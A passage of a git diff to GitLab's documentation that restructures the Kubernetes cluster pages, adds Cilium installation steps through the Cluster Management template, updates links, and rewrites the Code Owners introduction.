level](../../instance/clusters/index.md). +Read through this document to get started. -To view your project level Kubernetes clusters, navigate to **Infrastructure > Kubernetes clusters** -from your project. On this page, you can [add a new cluster](#adding-and-removing-clusters) -and view information about your existing clusters, such as: +## Clusters infrastructure -- Nodes count. -- Rough estimates of memory and CPU usage. +Use [Infrastructure as Code](../../infrastructure) to create and manage your clusters with the GitLab integration with Terraform. + +## Benefit from the GitLab-Kubernetes integration + +Using the GitLab-Kubernetes integration, you can benefit of GitLab +features such as: -## Setting up +- Create [CI/CD Pipelines](../../../ci/pipelines/index.md) to build, test, and deploy to your cluster. +- Use [Auto DevOps](#auto-devops) to automate the CI/CD process. +- Use [role-based or attribute-based access controls](cluster_access.md). +- Run serverless workloads on [Kubernetes with Knative](serverless/index.md). +- Connect GitLab to in-cluster applications using [cluster integrations](../../clusters/integrations.md). +- Use [Deploy Boards](../deploy_boards.md) to see the health and status of each CI [environment](../../../ci/environments/index.md) running on your Kubernetes cluster. +- Use [Canary deployments](../canary_deployments.md) to update only a portion of your fleet with the latest version of your application. +- View your [Kubernetes podlogs](kubernetes_pod_logs.md) directly in GitLab. +- Connect to your cluster through GitLab [web terminals](deploy_to_cluster.md#web-terminals-for-kubernetes-clusters). -### Supported cluster versions +## Supported cluster versions GitLab is committed to support at least two production-ready Kubernetes minor versions at any given time. We regularly review the versions we support, and @@ -48,7 +43,7 @@ provide a three-month deprecation period before we remove support of a specific version. The range of supported versions is based on the evaluation of: - The versions supported by major managed Kubernetes providers. -- The versions [supported by the Kubernetes community](https://kubernetes.io/docs/setup/release/version-skew-policy/#supported-versions). +- The versions [supported by the Kubernetes community](https://kubernetes.io/releases/version-skew-policy/#supported-versions). GitLab supports the following Kubernetes versions, and you can upgrade your Kubernetes version to any supported version at any time: @@ -61,88 +56,34 @@ Kubernetes version to any supported version at any time: Some GitLab features may support versions outside the range provided here. -NOTE: -[GKE Cluster creation](add_remove_clusters.md#create-new-cluster) by GitLab is currently not supported for Kubernetes 1.19+. For these versions you can create the cluster through GCP, then [Add existing cluster](add_remove_clusters.md#add-existing-cluster). See [the related issue](https://gitlab.com/gitlab-org/gitlab/-/issues/331922) for more information. - -### Adding and removing clusters - -See [Adding and removing Kubernetes clusters](add_remove_clusters.md) for details on how -to: - -- Create a cluster in Google Cloud Platform (GCP) or Amazon Elastic Kubernetes Service - (EKS) using the GitLab UI. -- Add an integration to an existing cluster from any Kubernetes platform. - -### Multiple Kubernetes clusters - -> - Introduced in [GitLab Premium](https://about.gitlab.com/pricing/) 10.3 -> - [Moved](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/35094) to GitLab Free in 13.2. +## Add and remove clusters -You can associate more than one Kubernetes cluster to your -project. That way you can have different clusters for different environments, -like development, staging, production, and so on. -Add another cluster, like you did the first time, and make sure to -[set an environment scope](#setting-the-environment-scope) that -differentiates the new cluster from the rest. +You can create new or add existing clusters to GitLab: -#### Setting the environment scope +- On the project-level, to have a cluster dedicated to a project. +- On the [group level](../../group/clusters/index.md), to use the same cluster across multiple projects within your group. +- On the [instance level](../../instance/clusters/index.md), to use the same cluster across multiple groups and projects. **(FREE SELF)** -When adding more than one Kubernetes cluster to your project, you need to differentiate -them with an environment scope. The environment scope associates clusters with [environments](../../../ci/environments/index.md) similar to how the -[environment-specific CI/CD variables](../../../ci/variables/README.md#limit-the-environment-scope-of-a-cicd-variable) work. +To create new clusters, use one of the following methods: -The default environment scope is `*`, which means all jobs, regardless of their -environment, use that cluster. Each scope can be used only by a single cluster -in a project, and a validation error occurs if otherwise. Also, jobs that don't -have an environment keyword set can't access any cluster. +- [Infrastructure as Code](../../infrastructure/index.md) (**recommended**). +- [Cluster certificates](add_remove_clusters.md) (**deprecated**). -For example, let's say the following Kubernetes clusters exist in a project: +You can also [add existing clusters](add_existing_cluster.md) to GitLab. -| Cluster | Environment scope | -| ----------- | ----------------- | -| Development | `*` | -| Production | `production` | +## View your clusters -And the following environments are set in -[`.gitlab-ci.yml`](../../../ci/yaml/README.md): - -```yaml -stages: - - test - - deploy - -test: - stage: test - script: sh test - -deploy to staging: - stage: deploy - script: make deploy - environment: - name: staging - url: https://staging.example.com/ - -deploy to production: - stage: deploy - script: make deploy - environment: - name: production - url: https://example.com/ -``` - -The results: +To view your project-level Kubernetes clusters, to go **Infrastructure > Kubernetes clusters** +from your project. On this page, you can add a new cluster +and view information about your existing clusters, such as: -- The Development cluster details are available in the `deploy to staging` - job. -- The production cluster details are available in the `deploy to production` - job. -- No cluster details are available in the `test` job because it doesn't - define any environment. +- Nodes count. +- Rough estimates of memory and CPU usage. ## Configuring your Kubernetes cluster -After [adding a Kubernetes cluster](add_remove_clusters.md) to GitLab, read this section that covers -important considerations for configuring Kubernetes clusters with GitLab. +Use the [GitLab Kubernetes Agent](../../clusters/agent/index.md) to safely +configure your clusters. Otherwise, there are [security implications](#security-implications). ### Security implications @@ -155,103 +96,15 @@ functionalities needed to successfully build and deploy a containerized application. Bear in mind that the same credentials are used for all the applications running on the cluster. -### GitLab-managed clusters - -> - [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/22011) in GitLab 11.5. -> - Became [optional](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/26565) in GitLab 11.11. - -You can choose to allow GitLab to manage your cluster for you. If your cluster -is managed by GitLab, resources for your projects are automatically created. See -the [Access controls](add_remove_clusters.md#access-controls) section for -details about the created resources. - -If you choose to manage your own cluster, project-specific resources aren't created -automatically. If you are using [Auto DevOps](../../../topics/autodevops/index.md), you must -explicitly provide the `KUBE_NAMESPACE` [deployment variable](#deployment-variables) -for your deployment jobs to use. Otherwise, a namespace is created for you. - -#### Important notes - -Be aware that manually managing resources that have been created by GitLab, like -namespaces and service accounts, can cause unexpected errors. If this occurs, try -[clearing the cluster cache](#clearing-the-cluster-cache). - -#### Clearing the cluster cache - -> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/31759) in GitLab 12.6. - -If you allow GitLab to manage your cluster, GitLab stores a cached -version of the namespaces and service accounts it creates for your projects. If you -modify these resources in your cluster manually, this cache can fall out of sync with -your cluster. This can cause deployment jobs to fail. - -To clear the cache: - -1. Navigate to your project's **Infrastructure > Kubernetes clusters** page, and select your cluster. -1. Expand the **Advanced settings** section. -1. Click **Clear cluster cache**. - -### Base domain - -> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/24580) in GitLab 11.8. - -Specifying a base domain automatically sets `KUBE_INGRESS_BASE_DOMAIN` as an deployment variable. -If you are using [Auto DevOps](../../../topics/autodevops/index.md), this domain is used for the different -stages. For example, Auto Review Apps and Auto Deploy. - -The domain should have a wildcard DNS configured to the Ingress IP address. -You can either: - -- Create an `A` record that points to the Ingress IP address with your domain provider. -- Enter a wildcard DNS address using a service such as `nip.io` or `xip.io`. For example, `192.168.1.1.xip.io`. - -To determine the external Ingress IP address, or external Ingress hostname: - -- *If the cluster is on GKE*: - 1. Click the **Google Kubernetes Engine** link in the **Advanced settings**, - or go directly to the [Google Kubernetes Engine dashboard](https://console.cloud.google.com/kubernetes/). - 1. Select the proper project and cluster. - 1. Click **Connect** - 1. Execute the `gcloud` command in a local terminal or using the **Cloud Shell**. - -- *If the cluster is not on GKE*: Follow the specific instructions for your - Kubernetes provider to configure `kubectl` with the right credentials. - The output of the following examples show the external endpoint of your - cluster. This information can then be used to set up DNS entries and forwarding - rules that allow external access to your deployed applications. - -Depending an your Ingress, the external IP address can be retrieved in various ways. -This list provides a generic solution, and some GitLab-specific approaches: - -- In general, you can list the IP addresses of all load balancers by running: - - ```shell - kubectl get svc --all-namespaces -o jsonpath='{range.items[?(@.status.loadBalancer.ingress)]}{.status.loadBalancer.ingress[*].ip} ' - ``` - -- If you installed Ingress using the **Applications**, run: - - ```shell - kubectl get service --namespace=gitlab-managed-apps ingress-nginx-ingress-controller -o jsonpath='{.status.loadBalancer.ingress[0].ip}' - ``` - -- Some Kubernetes clusters return a hostname instead, like - [Amazon EKS](https://aws.amazon.com/eks/). For these platforms, run: - - ```shell - kubectl get service --namespace=gitlab-managed-apps ingress-nginx-ingress-controller -o jsonpath='{.status.loadBalancer.ingress[0].hostname}' - ``` - - If you use EKS, an [Elastic Load Balancer](https://docs.aws.amazon.com/elasticloadbalancing/) - is also created, which incurs additional AWS costs. +## Multiple Kubernetes clusters -- Istio/Knative uses a different command. Run: +See how to associate [multiple Kubernetes clusters](multiple_kubernetes_clusters.md) +with your GitLab project. - ```shell - kubectl get svc --namespace=istio-system istio-ingressgateway -o jsonpath='{.status.loadBalancer.ingress[0].ip} ' - ``` +## Cluster integrations -If you see a trailing `%` on some Kubernetes versions, do not include it. +See the available [cluster integrations](../../clusters/integrations.md) +to integrate third-party applications with your clusters through GitLab. ## Cluster management project @@ -259,180 +112,18 @@ Attach a [Cluster management project](../../clusters/management_project.md) to your cluster to manage shared resources requiring `cluster-admin` privileges for installation, such as an Ingress controller. -## Auto DevOps +## GitLab-managed clusters -Auto DevOps automatically detects, builds, tests, deploys, and monitors your -applications. +See how to allow [GitLab to manage your cluster for you](gitlab_managed_clusters.md). -To make full use of Auto DevOps (Auto Deploy, Auto Review Apps, and -Auto Monitoring) the Kubernetes project integration must be enabled. However, -Kubernetes clusters can be used without Auto DevOps. +## Auto DevOps -[Read more about Auto DevOps](../../../topics/autodevops/index.md). +You can use [Auto DevOps](../../../topics/autodevops/index.md) to automatically +detect, build, test, deploy, and monitor your applications. ## Deploying to a Kubernetes cluster -A Kubernetes cluster can be the destination for a deployment job. If - -- The cluster is integrated with GitLab, special - [deployment variables](#deployment-variables) are made available to your job - and configuration is not required. You can immediately begin interacting with - the cluster from your jobs using tools such as `kubectl` or `helm`. -- You don't use the GitLab cluster integration, you can still deploy to your - cluster. However, you must configure Kubernetes tools yourself - using [CI/CD variables](../../../ci/variables/README.md#custom-cicd-variables) - before you can interact with the cluster from your jobs. - -### Deployment variables - -Deployment variables require a valid [Deploy Token](../deploy_tokens/index.md) named -[`gitlab-deploy-token`](../deploy_tokens/index.md#gitlab-deploy-token), and the -following command in your deployment job script, for Kubernetes to access the registry: - -- Using Kubernetes 1.18+: - - ```shell - kubectl create secret docker-registry gitlab-registry --docker-server="$CI_REGISTRY" --docker-username="$CI_DEPLOY_USER" --docker-password="$CI_DEPLOY_PASSWORD" --docker-email="$GITLAB_USER_EMAIL" -o yaml --dry-run=client | kubectl apply -f - - ``` - -- Using Kubernetes <1.18: - - ```shell - kubectl create secret docker-registry gitlab-registry --docker-server="$CI_REGISTRY" --docker-username="$CI_DEPLOY_USER" --docker-password="$CI_DEPLOY_PASSWORD" --docker-email="$GITLAB_USER_EMAIL" -o yaml --dry-run | kubectl apply -f - - ``` - -The Kubernetes cluster integration exposes these -[deployment variables](../../../ci/variables/README.md#deployment-variables) in the -GitLab CI/CD build environment to deployment jobs. Deployment jobs have -[defined a target environment](../../../ci/environments/index.md). - -| Deployment Variable | Description | -|----------------------------|-------------| -| `KUBE_URL` | Equal to the API URL. | -| `KUBE_TOKEN` | The Kubernetes token of the [environment service account](add_remove_clusters.md#access-controls). Prior to GitLab 11.5, `KUBE_TOKEN` was the Kubernetes token of the main service account of the cluster integration. | -| `KUBE_NAMESPACE` | The namespace associated with the project's deployment service account. In the format `<project_name>-<project_id>-<environment>`. For GitLab-managed clusters, a matching namespace is automatically created by GitLab in the cluster. If your cluster was created before GitLab 12.2, the default `KUBE_NAMESPACE` is set to `<project_name>-<project_id>`. | -| `KUBE_CA_PEM_FILE` | Path to a file containing PEM data. Only present if a custom CA bundle was specified. | -| `KUBE_CA_PEM` | (**deprecated**) Raw PEM data. Only if a custom CA bundle was specified. | -| `KUBECONFIG` | Path to a file containing `kubeconfig` for this deployment. CA bundle would be embedded if specified. This configuration also embeds the same token defined in `KUBE_TOKEN` so you likely need only this variable. This variable name is also automatically picked up by `kubectl` so you don't need to reference it explicitly if using `kubectl`. | -| `KUBE_INGRESS_BASE_DOMAIN` | From GitLab 11.8, this variable can be used to set a domain per cluster. See [cluster domains](#base-domain) for more information. | - -### Custom namespace - -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/27630) in GitLab 12.6. -> - An option to use project-wide namespaces [was added](https://gitlab.com/gitlab-org/gitlab/-/issues/38054) in GitLab 13.5. - -The Kubernetes integration provides a `KUBECONFIG` with an auto-generated namespace -to deployment jobs. It defaults to using project-environment specific namespaces -of the form `<prefix>-<environment>`, where `<prefix>` is of the form -`<project_name>-<project_id>`. To learn more, read [Deployment variables](#deployment-variables). - -You can customize the deployment namespace in a few ways: - -- You can choose between a **namespace per [environment](../../../ci/environments/index.md)** - or a **namespace per project**. A namespace per environment is the default and recommended - setting, as it prevents the mixing of resources between production and non-production environments. -- When using a project-level cluster, you can additionally customize the namespace prefix. - When using namespace-per-environment, the deployment namespace is `<prefix>-<environment>`, - but otherwise just `<prefix>`. -- For **non-managed** clusters, the auto-generated namespace is set in the `KUBECONFIG`, - but the user is responsible for ensuring its existence. You can fully customize - this value using - [`environment:kubernetes:namespace`](../../../ci/environments/index.md#configure-kubernetes-deployments) - in `.gitlab-ci.yml`. - -When you customize the namespace, existing environments remain linked to their current -namespaces until you [clear the cluster cache](#clearing-the-cluster-cache). - -#### Protecting credentials - -By default, anyone who can create a deployment job can access any CI/CD variable in -an environment's deployment job. This includes `KUBECONFIG`, which gives access to -any secret available to the associated service account in your cluster. -To keep your production credentials safe, consider using -[protected environments](../../../ci/environments/protected_environments.md), -combined with *one* of the following: - -- A GitLab-managed cluster and namespace per environment. -- An environment-scoped cluster per protected environment. The same cluster - can be added multiple times with multiple restricted service accounts. - -### Integrations - -#### Canary Deployments - -Leverage [Kubernetes' Canary deployments](https://kubernetes.io/docs/concepts/cluster-administration/manage-deployment/#canary-deployments) -and visualize your canary deployments right inside the Deploy Board, without -the need to leave GitLab. - -[Read more about Canary Deployments](../canary_deployments.md) - -#### Deploy Boards - -GitLab Deploy Boards offer a consolidated view of the current health and -status of each CI [environment](../../../ci/environments/index.md) running on Kubernetes. -They display the status of the pods in the deployment. Developers and other -teammates can view the progress and status of a rollout, pod by pod, in the -workflow they already use without any need to access Kubernetes. - -[Read more about Deploy Boards](../deploy_boards.md) - -#### Viewing pod logs - -GitLab enables you to view the logs of running pods in connected Kubernetes -clusters. By displaying the logs directly in GitLab, developers can avoid having -to manage console tools or jump to a different interface. - -[Read more about Kubernetes logs](kubernetes_pod_logs.md) - -#### Web terminals - -> Introduced in GitLab 8.15. - -When enabled, the Kubernetes integration adds [web terminal](../../../ci/environments/index.md#web-terminals) -support to your [environments](../../../ci/environments/index.md). This is based -on the `exec` functionality found in Docker and Kubernetes, so you get a new -shell session in your existing containers. To use this integration, you -should deploy to Kubernetes using the deployment variables above, ensuring any -deployments, replica sets, and pods are annotated with: - -- `app.gitlab.com/env: $CI_ENVIRONMENT_SLUG` -- `app.gitlab.com/app: $CI_PROJECT_PATH_SLUG` - -`$CI_ENVIRONMENT_SLUG` and `$CI_PROJECT_PATH_SLUG` are the values of -the CI/CD variables. - -You must be the project owner or have `maintainer` permissions to use terminals. -Support is limited to the first container in the first pod of your environment. - -### Troubleshooting - -Before the deployment jobs starts, GitLab creates the following specifically for -the deployment job: - -- A namespace. -- A service account. - -However, sometimes GitLab can not create them. In such instances, your job can fail with the message: - -```plaintext -This job failed because the necessary resources were not successfully created. -``` - -To find the cause of this error when creating a namespace and service account, check the [logs](../../../administration/logs.md#kuberneteslog). - -Reasons for failure include: - -- The token you gave GitLab does not have [`cluster-admin`](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#user-facing-roles) - privileges required by GitLab. -- Missing `KUBECONFIG` or `KUBE_TOKEN` deployment variables. To be passed to your job, they must have a matching - [`environment:name`](../../../ci/environments/index.md). If your job has no - `environment:name` set, the Kubernetes credentials are not passed to it. - -NOTE: -Project-level clusters upgraded from GitLab 12.0 or older may be configured -in a way that causes this error. Ensure you deselect the -[GitLab-managed cluster](#gitlab-managed-clusters) option if you want to manage -namespaces and service accounts yourself. +See how to [deploy to your Kubernetes cluster](deploy_to_cluster.md) from GitLab. ## Monitoring your Kubernetes cluster diff --git a/doc/user/project/clusters/multiple_kubernetes_clusters.md b/doc/user/project/clusters/multiple_kubernetes_clusters.md new file mode 100644 index 00000000000..e2eae011b8c --- /dev/null +++ b/doc/user/project/clusters/multiple_kubernetes_clusters.md @@ -0,0 +1,71 @@ +--- +stage: Configure +group: Configure +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +--- + +# Multiple Kubernetes clusters for a single project + +> - Introduced in [GitLab Premium](https://about.gitlab.com/pricing/) 10.3 +> - [Moved](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/35094) to GitLab Free in 13.2. + +You can associate more than one Kubernetes cluster to your +project. That way you can have different clusters for different environments, +like development, staging, production, and so on. +Add another cluster, like you did the first time, and make sure to +[set an environment scope](#setting-the-environment-scope) that +differentiates the new cluster from the rest. + +## Setting the environment scope + +When adding more than one Kubernetes cluster to your project, you need to differentiate +them with an environment scope. The environment scope associates clusters with [environments](../../../ci/environments/index.md) similar to how the +[environment-specific CI/CD variables](../../../ci/variables/index.md#limit-the-environment-scope-of-a-cicd-variable) work. + +The default environment scope is `*`, which means all jobs, regardless of their +environment, use that cluster. Each scope can be used only by a single cluster +in a project, and a validation error occurs if otherwise. Also, jobs that don't +have an environment keyword set can't access any cluster. + +For example, let's say the following Kubernetes clusters exist in a project: + +| Cluster | Environment scope | +| ----------- | ----------------- | +| Development | `*` | +| Production | `production` | + +And the following environments are set in +[`.gitlab-ci.yml`](../../../ci/yaml/index.md): + +```yaml +stages: + - test + - deploy + +test: + stage: test + script: sh test + +deploy to staging: + stage: deploy + script: make deploy + environment: + name: staging + url: https://staging.example.com/ + +deploy to production: + stage: deploy + script: make deploy + environment: + name: production + url: https://example.com/ +``` + +The results: + +- The Development cluster details are available in the `deploy to staging` + job. +- The production cluster details are available in the `deploy to production` + job. +- No cluster details are available in the `test` job because it doesn't + define any environment. diff --git a/doc/user/project/clusters/protect/container_host_security/quick_start_guide.md b/doc/user/project/clusters/protect/container_host_security/quick_start_guide.md index ebcd56078ae..466bcb7916f 100644 --- a/doc/user/project/clusters/protect/container_host_security/quick_start_guide.md +++ b/doc/user/project/clusters/protect/container_host_security/quick_start_guide.md @@ -20,7 +20,7 @@ The following steps are recommended to install and use Container Host Security t 1. Install and configure an Ingress node: - [Install the Ingress node via CI/CD (Cluster Management Project)](../../../../clusters/applications.md#install-ingress-using-gitlab-cicd). - - Navigate to the Kubernetes page and enter the [DNS address for the external endpoint](../../index.md#base-domain) + - Navigate to the Kubernetes page and enter the [DNS address for the external endpoint](../../gitlab_managed_clusters.md#base-domain) into the **Base domain** field on the **Details** tab. Save the changes to the Kubernetes cluster. @@ -50,7 +50,7 @@ kubectl -n gitlab-managed-apps logs -l app=falco Your CI/CD pipeline may occasionally fail or have trouble connecting to the cluster. Here are some initial troubleshooting steps that resolve the most common problems: -1. [Clear the cluster cache](../../index.md#clearing-the-cluster-cache) +1. [Clear the cluster cache](../../gitlab_managed_clusters.md#clearing-the-cluster-cache) 1. If things still aren't working, a more assertive set of actions may help get things back to a good state: diff --git a/doc/user/project/clusters/protect/container_network_security/quick_start_guide.md b/doc/user/project/clusters/protect/container_network_security/quick_start_guide.md index 33aefec224a..62010bb7802 100644 --- a/doc/user/project/clusters/protect/container_network_security/quick_start_guide.md +++ b/doc/user/project/clusters/protect/container_network_security/quick_start_guide.md @@ -20,20 +20,114 @@ The following steps are recommended to install and use Container Network Securit 1. Install and configure an Ingress node: - [Install the Ingress node via CI/CD (Cluster Management Project)](../../../../clusters/applications.md#install-ingress-using-gitlab-cicd). - - Navigate to the Kubernetes page and enter the [DNS address for the external endpoint](../../index.md#base-domain) + - Navigate to the Kubernetes page and enter the [DNS address for the external endpoint](../../gitlab_managed_clusters.md#base-domain) into the **Base domain** field on the **Details** tab. Save the changes to the Kubernetes cluster. -1. [Install and configure Cilium](../../../../clusters/applications.md#install-cilium-using-gitlab-cicd). +1. [Install and configure Cilium](#use-the-cluster-management-template-to-install-cilium). 1. Be sure to restart all pods that were running before Cilium was installed by running this command in your cluster: `kubectl get pods --all-namespaces -o custom-columns=NAMESPACE:.metadata.namespace,NAME:.metadata.name,HOSTNETWORK:.spec.hostNetwork --no-headers=true | grep '<none>' | awk '{print "-n "$1" "$2}' | xargs -L 1 -r kubectl delete pod` + You can skip this step if `nodeinit.restartPods` is set to `true` on your Helm chart. + It's possible to install and manage Cilium in other ways. For example, you could use the GitLab Helm chart to install Cilium manually in a Kubernetes cluster, and then connect it back to GitLab. However, such methods aren't documented or officially supported by GitLab. +### Use the Cluster Management template to install Cilium + +[Cilium](https://cilium.io/) is a networking plug-in for Kubernetes that you can use to implement +support for [`NetworkPolicy`](https://kubernetes.io/docs/concepts/services-networking/network-policies/) +resources. For more information, see [Network Policies](../../../../../topics/autodevops/stages.md#network-policy). + +You can use the [Cluster Management Project Template](../../../../clusters/management_project_template.md) +to install Cilium in your Kubernetes cluster. + +1. In your cluster management project, go to `helmfile.yaml` and uncomment `- path: applications/cilium/helmfile.yaml`. +1. In `applications/cilium/helmfile.yaml`, set `clusterType` to either `gke` or `eks` based on which Kubernetes provider your are using. + + ```yaml + environments: + default: + values: + # Set to "gke" or "eks" based on your cluster type + - clusterType: "" + ``` + +1. Merge or push these changes to the default branch of your cluster management project, +and [GitLab CI/CD](../../../../../ci/README.md) will automatically install Cilium. + +WARNING: +Installation and removal of the Cilium requires a **manual** +[restart](https://docs.cilium.io/en/stable/gettingstarted/k8s-install-helm/#restart-unmanaged-pods) +of all affected pods in all namespaces to ensure that they are +[managed](https://docs.cilium.io/en/stable/operations/troubleshooting/#ensure-managed-pod) +by the correct networking plug-in. When Hubble is enabled, its related pod might require a +restart depending on whether it started prior to Cilium. For more information, see +[Failed Deployment](https://kubernetes.io/docs/concepts/workloads/controllers/deployment/#failed-deployment) +in the Kubernetes docs. + +NOTE: +Major upgrades might require additional setup steps. For more information, see +the official [upgrade guide](https://docs.cilium.io/en/stable/operations/upgrade/). + +Support for installing the Cilium application is provided by the +GitLab Container Security group. If you run into unknown issues, +[open a new issue](https://gitlab.com/gitlab-org/gitlab/-/issues/new), and ping at +least 2 people from the +[Container Security group](https://about.gitlab.com/handbook/product/categories/#container-security-group). + +### Configure the Cilium Helm chart + +You can customize Cilium's Helm variables by editing the `applications/cilium/values.yaml` +file in your cluster management project. Refer to the [Cilium Helm reference](https://docs.cilium.io/en/stable/helm-reference/) +for the available configuration options. + +By default, Cilium's +[audit mode](https://docs.cilium.io/en/stable/gettingstarted/policy-creation/#enable-policy-audit-mode) +is enabled. In audit mode, Cilium doesn't drop disallowed packets. You +can use `policy-verdict` log to observe policy-related decisions. You +can disable audit mode by setting `policyAuditMode: false` in +`applications/cilium/values.yaml`. + +The Cilium monitor log for traffic is logged out by the +`cilium-monitor` sidecar container. You can check these logs with the following command: + +```shell +kubectl -n gitlab-managed-apps logs -l k8s-app=cilium -c cilium-monitor +``` + +You can disable the monitor log in `application/cilium/values.yaml`: + +```yaml +monitor: + enabled: false +``` + +The [Hubble](https://github.com/cilium/hubble) monitoring daemon is enabled by default +and it's set to collect per namespace flow metrics. This metrics are accessible on the +[Threat Monitoring](../../../../application_security/threat_monitoring/index.md) +dashboard. You can disable Hubble by adding the following to +`applications/cilium/values.yaml`: + +```yaml +hubble: + enabled: false +``` + +You can also adjust Helm values for Hubble by using +`applications/cilium/values.yaml`: + +```yaml +hubble: + enabled: true + metrics: + enabled: + - 'flow:sourceContext=namespace;destinationContext=namespace' +``` + ## Managing Network Policies Managing NetworkPolicies through GitLab is advantageous over managing the policies in Kubernetes @@ -62,16 +156,14 @@ editor. To view statistics for Container Network Security, you must follow the installation steps above and configure GitLab integration with Prometheus. Also, if you use custom Helm values for Cilium, you must enable Hubble with flow metrics for each namespace by adding the following lines to -your [Cilium values](../../../../clusters/applications.md#install-cilium-using-gitlab-cicd): -your [Cilium values](../../../../clusters/applications.md#install-cilium-using-gitlab-cicd): +your [Cilium values](#use-the-cluster-management-template-to-install-cilium): ```yaml -global: - hubble: - enabled: true - metrics: - enabled: - - 'flow:sourceContext=namespace;destinationContext=namespace' +hubble: + enabled: true + metrics: + enabled: + - 'flow:sourceContext=namespace;destinationContext=namespace' ``` Additional information about the statistics page is available in the @@ -97,15 +189,14 @@ kubectl -n gitlab-managed-apps logs -l k8s-app=cilium -c cilium-monitor By default, Cilium is installed in Audit mode only, meaning that NetworkPolicies log policy violations but don't block any traffic. To set Cilium to Blocking mode, you must add the following -lines to the `.gitlab/managed-apps/cilium/values.yaml` file in your cluster management project: +lines to the `applications/cilium/values.yaml` file in your cluster management project: ```yaml config: policyAuditMode: false -agent: - monitor: - eventTypes: ["drop"] +monitor: + eventTypes: ["drop"] ``` ### Traffic is not being allowed as expected @@ -120,7 +211,7 @@ traffic that you want to allow in the node. Occasionally, your CI/CD pipeline may fail or have trouble connecting to the cluster. Here are some initial troubleshooting steps that resolve the most common problems: -1. [Clear the cluster cache](../../index.md#clearing-the-cluster-cache). +1. [Clear the cluster cache](../../gitlab_managed_clusters.md#clearing-the-cluster-cache). 1. If things still aren't working, a more assertive set of actions may help get things back into a good state: diff --git a/doc/user/project/clusters/serverless/aws.md b/doc/user/project/clusters/serverless/aws.md index 5d6fb8252bb..6eafb4530d3 100644 --- a/doc/user/project/clusters/serverless/aws.md +++ b/doc/user/project/clusters/serverless/aws.md @@ -134,7 +134,7 @@ This example code does the following: #### Setting up your AWS credentials with your GitLab account In order to interact with your AWS account, the GitLab CI/CD pipelines require both `AWS_ACCESS_KEY_ID` and `AWS_SECRET_ACCESS_KEY` to be defined in your GitLab settings under **Settings > CI/CD > Variables**. -For more information please see [Create a custom variable in the UI](../../../../ci/variables/README.md#custom-variables-validated-by-gitlab). +For more information please see [Create a custom variable in the UI](../../../../ci/variables/index.md#custom-variables-validated-by-gitlab). The AWS credentials you provide must include IAM policies that provision correct access control to AWS Lambda, API Gateway, CloudFormation, and IAM resources. @@ -381,7 +381,7 @@ control to AWS Lambda, API Gateway, CloudFormation, and IAM resources. ### Crafting the `.gitlab-ci.yml` file -In a [`.gitlab-ci.yml`](../../../../ci/yaml/README.md) file in the root of your project, +In a [`.gitlab-ci.yml`](../../../../ci/yaml/index.md) file in the root of your project, add the following and replace `<S3_bucket_name>` with the name of the S3 bucket where you want to store your package: diff --git a/doc/user/project/clusters/serverless/img/function-details-loaded.png b/doc/user/project/clusters/serverless/img/function-details-loaded.png Binary files differdeleted file mode 100644 index 2f0d61f8032..00000000000 --- a/doc/user/project/clusters/serverless/img/function-details-loaded.png +++ /dev/null diff --git a/doc/user/project/clusters/serverless/img/function-details-loaded_v14_0.png b/doc/user/project/clusters/serverless/img/function-details-loaded_v14_0.png Binary files differnew file mode 100644 index 00000000000..a19d236fc39 --- /dev/null +++ b/doc/user/project/clusters/serverless/img/function-details-loaded_v14_0.png diff --git a/doc/user/project/clusters/serverless/img/serverless-page.png b/doc/user/project/clusters/serverless/img/serverless-page.png Binary files differdeleted file mode 100644 index 8dce3cb1f70..00000000000 --- a/doc/user/project/clusters/serverless/img/serverless-page.png +++ /dev/null diff --git a/doc/user/project/clusters/serverless/img/serverless-page_v14_0.png b/doc/user/project/clusters/serverless/img/serverless-page_v14_0.png Binary files differnew file mode 100644 index 00000000000..f88eb4bdcd2 --- /dev/null +++ b/doc/user/project/clusters/serverless/img/serverless-page_v14_0.png diff --git a/doc/user/project/clusters/serverless/index.md b/doc/user/project/clusters/serverless/index.md index e4ac1eabffe..ec22f71157f 100644 --- a/doc/user/project/clusters/serverless/index.md +++ b/doc/user/project/clusters/serverless/index.md @@ -322,7 +322,7 @@ being executed which deploys each function as a Knative service. After the deploy stage has finished, additional details for the function display under **Infrastructure > Serverless platform**. - + This page contains all functions available for the project, the description for accessing the function, and, if available, the function's runtime information. @@ -364,7 +364,7 @@ kubectl create secret generic my-secrets -n "$KUBE_NAMESPACE" --from-literal MY_ #### Part of deployment job -You can extend your `.gitlab-ci.yml` to create the secrets during deployment using the [CI/CD variables](../../../../ci/variables/README.md) +You can extend your `.gitlab-ci.yml` to create the secrets during deployment using the [CI/CD variables](../../../../ci/variables/index.md) stored securely under your GitLab project. ```yaml @@ -463,7 +463,7 @@ Go to the **Infrastructure > Serverless platform** page to see the final URL of On the same page as above, click on one of the function rows to bring up the function details page. - + The pod count gives you the number of pods running the serverless function instances on a given cluster. diff --git a/doc/user/project/code_owners.md b/doc/user/project/code_owners.md index ea7bcce99c1..2a60c06814b 100644 --- a/doc/user/project/code_owners.md +++ b/doc/user/project/code_owners.md @@ -11,56 +11,56 @@ type: reference > - Code Owners for Merge Request approvals was [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/4418) in GitLab Premium 11.9. > - Moved to GitLab Premium in 13.9. -## Introduction +Code Owners define who owns specific files or paths in a repository. +You can require that Code Owners approve a merge request before it's merged. -When contributing to a project, it can often be difficult -to find out who should review or approve merge requests. -Additionally, if you have a question over a specific file or -code block, it may be difficult to know who to find the answer from. +Code Owners help you determine who should review or approve merge requests. +If you have a question about a file or feature, Code Owners +can help you find someone who knows the answer. -The GitLab Code Owners feature defines who owns specific -files or paths in a repository, allowing other users to understand -who is responsible for each file or path. +If you don't want to use Code Owners for approvals, you can +[configure rules](merge_requests/approvals/rules.md) instead. -As an alternative to using Code Owners for approvals, you can instead -[configure rules](merge_requests/approvals/rules.md). +## Set up Code Owners -## Why is this useful? +You can specify users or [shared groups](members/share_project_with_groups.md) +that are responsible for specific files and directories in a repository. -Code Owners allows for a version controlled, single source of -truth file outlining the exact GitLab users or groups that -own certain files or 